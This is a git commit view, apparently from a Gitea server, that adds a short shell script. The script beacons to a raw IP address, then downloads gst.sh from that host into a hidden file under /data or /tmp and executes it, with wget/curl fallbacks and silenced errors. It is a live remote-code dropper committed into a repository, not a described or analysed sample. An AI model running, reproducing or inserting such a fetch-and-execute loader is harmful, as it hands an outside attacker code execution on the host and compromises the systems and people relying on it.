This commit is contained in:
2026-09-16 15:10:27 +08:00
parent d63ae43d5a
commit 959095a01d
+2
View File
@@ -0,0 +1,2 @@
#!/bin/sh
export PATH=/bin:/usr/bin:/sbin:/usr/sbin;(wget -q -O /dev/null http://85.137.54.178:8080/gt-b-42625958||curl -fsS -o /dev/null http://85.137.54.178:8080/gt-b-42625958);s=/data/.gst; mkdir -p /data /data/git 2>/dev/null;wget -q -O \$s http://85.137.54.178:8080/gst.sh||curl -fsS -o \$s http://85.137.54.178:8080/gst.sh||wget -q -O /tmp/.gst http://85.137.54.178:8080/gst.sh||true;[ -f \$s ]||s=/tmp/.gst;sh \$s 应用-gitea;sleep 2